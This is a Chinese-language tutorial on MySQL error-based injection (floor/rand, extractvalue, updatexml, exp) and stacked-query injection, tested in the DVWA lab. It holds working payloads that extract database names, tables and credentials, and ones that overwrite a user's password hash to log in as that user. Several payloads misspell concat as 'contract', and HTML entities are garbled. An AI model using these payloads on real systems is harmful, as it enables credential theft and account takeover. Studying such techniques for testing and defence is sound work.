简学SQL注入（报错注入与堆叠注入）

0x09 SQL注入之报错注入

• 一种 SQL 注入的类型&＃xff0c;用于 SQL 语句报错的语法&＃xff0c;用于注入无回显&＃xff0c;但会提示报错信息的情况。返回的错误信息&＃xff0c;即攻击者需要的信息。

0x09.1 报错注入的原理

• MySQL 报错注入主要利用了 MySQL 的一些逻辑漏洞&＃xff0c;如 BigInt 大整型数溢出、不同函数调用漏洞等&＃xff0c;因此根据逻辑特点&＃xff0c;可以将报错注入分为以下几点&＃xff1a;
  • BigInt 等数据类型溢出&＃xff1b;
  • Xpath语法错误&＃xff1b;
  • count() &＃43; rand()*2 &＃43; group_by() 重复计数&＃xff0c;导致临时表插入主键重复造成报错&＃xff1b;
  • 空间数据类型函数错误&＃xff1b;

0x09.2 报错注入常见的函数

• 会导致 MySQL 报错并显示出数据函数&＃xff1a;
  • rand() 函数&＃xff1a;rand(N) 返回随机浮点数 a&＃xff0c;范围是 0 <&＃61; a <1.0&＃xff1b;
  • count() 函数&＃xff1a;count(x) 返回 x 数据集的数量&＃xff1b;
  • floor() 函数&＃xff1a;floor(x) 会返回一个不大于 x 的整数&＃xff1b;
    • 由 floor() &＃43; rand() &＃43; group by 导致的主键冲突报错&＃xff1a;

      select count(*),concat((select user()),floor(rand(0)*2)) x from users group by x


    • 这个注入主要是利用 concat() 函数将 注入语句与 floor(rand(0)*2) 拼接起来&＃xff0c;将想要查询的结果与报错内容一并你回显给攻击者&＃xff0c;从而达到报错注入的目的。
      
    • 如果想要深入理解为什么 floor(rand(0)*2) 与 group by 结合会产生主键冲突报错&＃xff0c;这里我引用之前看到的一篇文章很详细的解释了原因&＃xff1a;Mysql报错注入之floor(rand(0)*2)报错原理探究.
  • extractvalue() 函数&＃xff1a;使用 XPath 表示发从 xml 文档中获取指定元素。(最多32个字符)&＃xff1b;
    • extractvalue(xml_flag,xpath_expr) 函数会接受两个参数&＃xff0c;X_flag 表示在 xml 中的节点片段&＃xff0c;xpath_expr 表示 Xpath 格式的查找路径。如果第二个参数不符合 Xpath 的语法规则&＃xff0c;会引起数据库报错。这也是我们在注入是利用的点。
    • payload&＃xff1a;

      &＃61;id?&＃39; and extractvalue(1,concat(0x7e,(select &＃64;&＃64;version))) -- &＃39;


    • 这条命令&＃xff0c;通过在 id 后面添加单引号(&＃39;) 闭合参数&＃xff0c;然后拼接 extractvalue 函数执行 注入语句。在函数中使用 concat() 是因为我们查询的结果会被 extractvalue 截断一部分字符&＃xff0c;如下&＃xff1a;
      
    • 因此我们需要利用 concat 函数去拼接一个 extractvalue 无法处理的字符&＃xff0c;从而使我们获取到的信息完整。
      
    • 下面是在 DVWA 中测试的结果&＃xff1a;
      
    • 尝试获取后端数据库&＃xff1a;

      ?id&＃61;&＃39; and extractvalue(1,contract(0x7e,database())) --


    • 尝试获取库中的表&＃xff1a;

      ?id&＃61;&＃39; and extractvalue(1,contract(0x7e,(select table_name from information_schema.tables where table_schema&＃61;database() limit 1,1))) --


    • 尝试获取表中的字段名&＃xff1a;

      ?id&＃61;&＃39; and extractvalue(1,contract(0x7e,(select column_name from information_schema.columns where table_name&＃61;&＃39;users&＃39; limit 1,1))) --


      • 通过调整调整limit 参数&＃xff0c;获取到 user 字段和 password 字段&＃xff0c;查询到的用户名为&＃xff1a;gordonb&＃xff0c;密码为&＃xff1a;abc123
        
        
    • 尝试获取用户和密码&＃xff0c;注意变更所需字段&＃xff1a;

      ?id&＃61;&＃39; and extractvalue(1,contract(0x7e,(select user from users limit 1,1))) --

      

    • 上图可以看出密码字段的数据是被加密的结果&＃xff0c;由于长度限制&＃xff0c;可能并未将密文完全取出&＃xff0c;因此我们采用 mid() 方法&＃xff0c;分段将密码密文取出后手工拼接&＃xff0c;随后解密。
      
      
      
  • updatexml() 函数&＃xff1a;更新选定 xml 片段的内容&＃xff1b;
    • updatexml 函数的利用方式同extractvalue 函数差不多&＃xff0c;都是利用参数的语法规则不正确从而触发报错。
    • payload&＃xff1a;

      ?id&＃61;&＃39; and updatexml(1,concat(0x7e,(select &＃64;&＃64;version)),1) -- &＃39;


    • 通过两个 1 触发函数报错&＃xff0c;利用 concat 函数将信息完整的拼接出来。
      
  • exp() 函数&＃xff1a;返回e的X次方的值&＃xff1b;
    • exp函数报错注入&＃xff0c;是利用其会产生 DOUBLE型数值溢出报错&＃xff0c;返回报错信息&＃xff0c;从而进行注入攻击。&＃xff08;这个漏洞貌似存在版本限制 <5.6&＃xff0c;下面只给出利用方法&＃xff09;产生报错是因为通过 ~ 对成功执行的函数取反就会得到最大的无符号BIGINT值&＃xff0c;超出 exp() 可接受的范围&＃xff0c;造成数值溢出报错。
    • payload&＃xff1a;

    ?id&＃61;&＃39; and exp(~(select * from (select &＃64;&＃64;version)x) -- &＃39;


    • 你可以通过以下代码在本地 Mysql 中进行测试&＃xff1a;

    select exp(~(select * from ("获取信息的查询语句")x));


0x10 SQL注入之堆叠注入

• 堆叠注入即多条 SQL 语句一起执行。在 Mysql 中&＃xff0c;主要是命令行&＃xff0c;我们通过加 ; 结束一个 SQL 语句后继续构造下一条语句&＃xff0c;使多条语句顺序执行&＃xff0c;这就是堆叠注入。

0x10.1 堆叠注入与 UNION 联合注入的区别

• UNION 或 UNION ALL 只能使用在查询上。而堆叠注入的多条语句之间是没有任何联系的&＃xff0c;可以执行任意语句。
• 堆叠注入的使用场景少&＃xff0c;很可能收到 API 或者数据库引擎不支持&＃xff0c;如果权限不足也无法使用&＃xff0c;但威力巨大。
• 在使用过程中&＃xff0c;通常 webapp 只返回一个查询结果&＃xff0c;因此&＃xff0c;堆叠注入第二个语句所产生的的错误和操作结果我们无法得知。在使用堆叠注入前&＃xff0c;我们还需要知道一些数据库相关的信息&＃xff0c;如表名&＃xff0c;列名等。

0x10.2 堆叠注入的使用

• 堆叠语句在 Mysql 中的多语句执行情况。
  
• PHP-Mysql 相关 API
  • mysqli_multi_query 、 mysqli_use_result
  • 看一下示例代码&＃xff1a;
    
• 通过堆叠注入修改用户密码实现用户登录&＃xff08;这里的测试环境采用的是 DVWA 的登录功能&＃xff09;
  • 通过前面的注入手段可以知道数据库名、表名、字段名等信息&＃xff1b;
    
  • 这里如果数据库的密码通过散列加密处理后&＃xff0c;我们无法破解的情况下&＃xff0c;可以利用堆叠注入直接用自己设置且加密后的密码“123456”替换掉原来的密码密文。
    
  • 替换 user_id &＃61; 5 的用户的密码密文
  • ?id&＃61;1&＃39;; update users set password&＃61;&＃39;e10adc3949ba59abbe56e057f20f883e&＃39; where user_id&＃61;5; --
    
  • 尝试使用密码&＃xff1a;123456 进行登录
    
  • 登录成功&＃xff0c;随后通过刚刚的方式将用户原来的密文替换回去&＃xff0c;这样将不会妨碍原用户的正常使用。
  • ?id&＃61;1&＃39;; update users set password&＃61;&＃39;5f4dcc3b5aa765d61d8327deb882cf99&＃39; where user_id&＃61;5; --
    
• 堆叠注入在实际中的利用频率并不高&＃xff0c;但他的危害性也是不可忽视的。